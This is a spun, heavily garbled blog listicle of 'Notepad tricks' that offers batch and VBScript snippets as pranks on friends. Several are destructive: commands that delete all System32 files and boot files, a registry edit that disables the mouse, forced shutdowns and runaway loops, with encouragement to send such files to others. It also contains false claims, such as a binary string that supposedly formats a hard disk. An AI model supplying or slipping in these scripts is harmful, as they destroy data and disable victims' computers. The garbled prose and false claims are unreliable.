20+ Best Notepad Tricks, Hacks & Commands in 2022

0
Notepad-1.jpg

Best Notepad Tricks, Hacks & Commands in 2022

At present we’re right here with the most recent Notepad tips and instructions. These tips are quite simple and simple to implement. With these tips, you possibly can have a number of enjoyable with your mates. Simply comply with the under publish to proceed.

Notepad is a utility program for Home windows working system. This utility software program helps to code varied packages that may even management the system workings by means of which you’ll carry out many tips. These tips are thrilling, and you should use these tips to prank your mates.

We primarily use Notepad just for typing functions, however this publish will change your expertise with Notepad. These tips are quite simple and simple to implement. With these tips, you possibly can have a number of enjoyable with your mates. Simply comply with the under publish to proceed.

Additionally Learn: Best PC Tricks and PC Hacks

Checklist of 25 Greatest Notepad Tips, Hacks & Instructions
(2022)

You can be having nice enjoyable. Simply learn out all of the tips given under. You could copy the code from right here and paste into the Notepad and put it aside with an extension “.bat”.

1. Notepad trick to Take a look at Antivirus

By utilizing this trick, you possibly can rapidly take a look at whether or not your antivirus is working completely or not.

X5O!P%@AP[4PZX54(P^) 7CC)7}$EICAR-STANDARD- ANTIVIRUS-TEST-FILE!$H+H*

Save it as test.exe and run the file and check if your antivirus detects it, then your antivirus is working perfectly; otherwise, change your antivirus.

2. Make A Personal Log-Book or A Diary

Copy the code below, paste it into Notepad, and save it as “log.txt”.

.LOG

Every time you open this log file, you will have all the log details with the date and time.

3. Constantly Repeat Any Messages

This is one of the Best Notepad tricks that will repeatedly repeat any of the computer screen’s messages. Just copy the below code and paste into the Notepad and save it as “message.bat”.

@ECHO off
:Begin
msg * Hi
msg * Are you having fun?
msg * I am!
msg * Lets have fun together!
msg * Because you have been o-w-n-e-d
GOTO BEGIN

4. Continually pop out CD Drive Using Notepad

This is my favorite trick as this trick continually pop out the CD drive whenever you try to close it. Just copy the below code and paste into the Notepad and save it as “cd.vbs”.

Set oWMP = CreateObject(“WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

5. Convey your friend a message and shut down their computer

Just copy the below code and paste into the Notepad and save it as “anyname.bat”.

@echo off
msg * Hey how are you
shutdown -c “Error! You are a stupid!” -s

6. Notepad Trick to type slowly

This trick will let you type slowly on the screen, and to do so, copy the below code and save it with “anyname.vbs” name.

WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject (“WScript.Shell”)
WshShell.Run “notepad”
WScript.Sleep 100
WshShell.AppActivate Notepad“”
WScript.Sleep 500
WshShell.SendKeys “Hel”
WScript.Sleep 500
WshShell.SendKeys “lo ”
WScript.Sleep 500
WshShell.SendKeys “, ho”
WScript.Sleep 500
WshShell.SendKeys “w a”
WScript.Sleep 500
WshShell.SendKeys “re ”
WScript.Sleep 500
WshShell.SendKeys “you”
WScript.Sleep 500
WshShell.SendKeys “? ”
WScript.Sleep 500
WshShell.SendKeys “I a”
WScript.Sleep 500
WshShell.SendKeys “m g”
WScript.Sleep 500
WshShell.SendKeys “ood”
WScript.Sleep 500
WshShell.SendKeys ” th”
WScript.Sleep 500
WshShell.SendKeys “ank”
WScript.Sleep 500
WshShell.SendKeys “s! “

7. Matrix Effect

This code will give you a matrix effect on your screen just copy the below code and paste in Notepad and save it as “anyname.bat”.

@echo off
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start

8. Format Hard Disk Using Just Notepad

This code will delete all your hard drive data. Just copy the below code and paste into Notepad and save it as “anyname.exe”.

01100110011011110111001001101101011000010111010000 100000011000110011101001011100 0010000000101111010100010010111101011000

9. Convert Text Into Audio Using Notepad

This is a very cool notepad trick and this code will convert your text into an audio file. Just copy the below code and paste it into Notepad and save it as “text-to-audio.vbs”

Dim message, sapi message=InputBox(“Enter your text for conversion–Tech-viral”,”Hover pc Hacks Text-To-Audio Converter”) Set sapi=CreateObject(“sapi.spvoice”) sapi.Speak message

10. Notepad Trick Print Tree Root

This trick is one of the Best Notepad Tricks that will print out a tree root on your screen. Just copy the below code, paste it into Notepad and save it as teekids in C: windows system.

print tree root
C:windowssystem
{print C:windowssystemwinlog
4*43″[email protected][455] 3hr4~

Word: If you wish to cease the “.vbs” recordsdata, press ALT+CTRL+DEL in your keyboard, open the duty supervisor, after which course of the part and cease the Wscript working file there.

11. Toggle Your Capslock

You may toggle the Capslock key of your keyboard by simply typing the code within the Notepad. Be sure that to save lots of the file as .vbs, open the saved file, and see what occurs whereas utilizing Capslock Key.

Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “CAPSLOCK”
loop

12. Pretend Error Message

Open the Notepad, paste the code and save the file as error.vbs. Once you open the saved file, you will notice an error message.

X=Msgbox(“Put your Message Right here”,0+16,”Put Title Right here”)

You may substitute and put your message right here and put your title right here together with your key phrases.

13. LED Dance of Keyboard Utilizing Notepad

Open Notepad, enter the next code, and save the file as “LEDDance.vbs”. When you open the saved file, you will notice all three LED lights of a keyboard will begin to blink repeatedly.

Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “CAPSLOCK”
wshshell.sendkeys “NUMLOCK”
wshshell.sendkeys “SCROLLLOCK”
loop

14. Create a Password Protected File Utilizing Notepad

We now have revealed an article relating to this. With the assistance of our article How to Create a Password Protected Folder Without any Software, you possibly can create a folder that’s password protected utilizing Notepad. Learn out the publish to know-how.

15. Open Notepad Repeatedly

That is the right prank to harass your pal. You could copy and paste the code contained in the Notepad and put it aside with any identify with the .bat extension. You may ship it to your pal and make them click on.

@ECHO OFF
:TOP
START %SYSTEMROOTpercentSYSTEM32NOTEPAD.EXE
GOTO TOP

16. World Commerce Middle Assault Trick

The flight variety of the airplane that had hit the World Commerce middle on 9/11 was Q33NY. You would possibly name this trick coincidence, however it is going to shock you.

Step 1. Open Notepad and sort ‘Q33N’ with out the citation mark in capital letters.

Step 2. Now enhance the font measurement to 72 and alter the font to Wingdings.

You can be shocked to search out out the visible graphics.

17. Disable Mouse Controls

Effectively, you need to by no means do that in your laptop, as a result of this methodology disables the mouse controls in your laptop.

rem Disable Mouse
set key=”HKEY_LOCAL_MACHINEsystemCurrentControlSetServicesMouclass”
reg delete %key%
reg add %key% /v Begin /t REG_DWORD /d 4

Paste the above code in Notepad and put it aside as disablemouse.bat in your laptop.

18. Bush Hid The Information

Effectively, this trick will solely work on the older model of home windows. You could open the Notepad and sort “bush hid the info” or “this app can break”. Put it aside and open it once more. You will note completely different characters as an alternative of what you typed. Effectively, this occurs due to a bug that’s current within the older model of home windows.

19. Altering The Header And Footer In Notepad

Effectively, open the Notepad after which browse to File>Web page Setup in Notepad, and there within the fields for header and footer kind within the following codes.

Changing The Header And Footer In Note

&c Middle the characters that comply with
&r Proper-align the characters that comply with
&d Print the present date
&t Print the present time
&f Print the identify of the doc
&p Print the web page quantity
&l Left-align the characters that comply with

20. Hit Enter Repeatedly

This trick will allow you to use the perform of the enter button to occur many times. Effectively, it’s essential to copy and paste the next code into the Notepad:

Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop

Save the file as a .vbs file format to see the magic.

21. Deleting Startup Information

Effectively, that is one thing that you simply shouldn’t strive in your laptop except you might be keen to lose all of your information. This code will take away the recordsdata that assist your laptop throughout the startup.

@ECHO OFF
ATTRIB -R -S -H C:AUTOEXEC.BAT
DEL C:AUTOEXEC.BAT
ATTRIB -R -S -H C:BOOT.INI
DEL C:BOOT.INI
ATTRIB -R -S -H C:NTLDR
DEL C:NTLDR
ATTRIB -R -S -H C:WINDOWSWIN.INI
DEL C:WINDOWSWIN.INI

Save the file in .bat file format. It should shut down your laptop and can delete all-important startup recordsdata. There’s no rollback possibility. Due to this fact you need to be conscious of what you may be doing. Please don’t use the above-given code to hurt anybody.

22. Hit Backspace Repeatedly

This is likely one of the funniest issues you are able to do to harass anybody. This trick will make hit backspace repeatedly. You could copy and paste the given code under within the notepad file:

MsgBox “Backspace many times and AGAIN”
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “bs”
loop

You could save the Notepad file in .vbs file format to make it work. You could use the Activity Supervisor on Home windows to cease the script.

23. Deleting System32 Information Utilizing Notepad

Effectively, that is one other notepad trick to devastate a PC. This notepad trick will delete System32 recordsdata resulting in system failure. It’s not advisable to implement the trick, however this code has the ability to close down any working laptop inside minutes.

DEL C:WINDOWSSYSTEM32*.*/Q

Be sure that to save lots of the notepad file in .bat file format.

24. Kind any sentence many times

That is one other enjoyable notepad trick that can be utilized to tug a prank on mates. This notepad trick will write something many times and once more. Customers must manually shut the method from the duty supervisor to get out of the typing loop. Right here’s the code.

Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “I’ll be typed many times”
loop

Be sure that to save lots of the notepad file in .vbs file format.

25. Drive home windows to close down

That is one other notepad trick that may forcefully shut down your laptop. You could enter the given code into the Notepad and put it aside in .bat format. Right here’s the code.

@echo off
shutdown laptop
-c “sleep tight” -s

Be sure that to save lots of the Notepad in .bat format

Utilizing these notepad tips, you possibly can simply prank your mates, have a number of enjoyable with them, and have an important expertise with the Notepad. I hope you just like the publish, don’t overlook to share it with your mates and go away a remark under about any associated queries.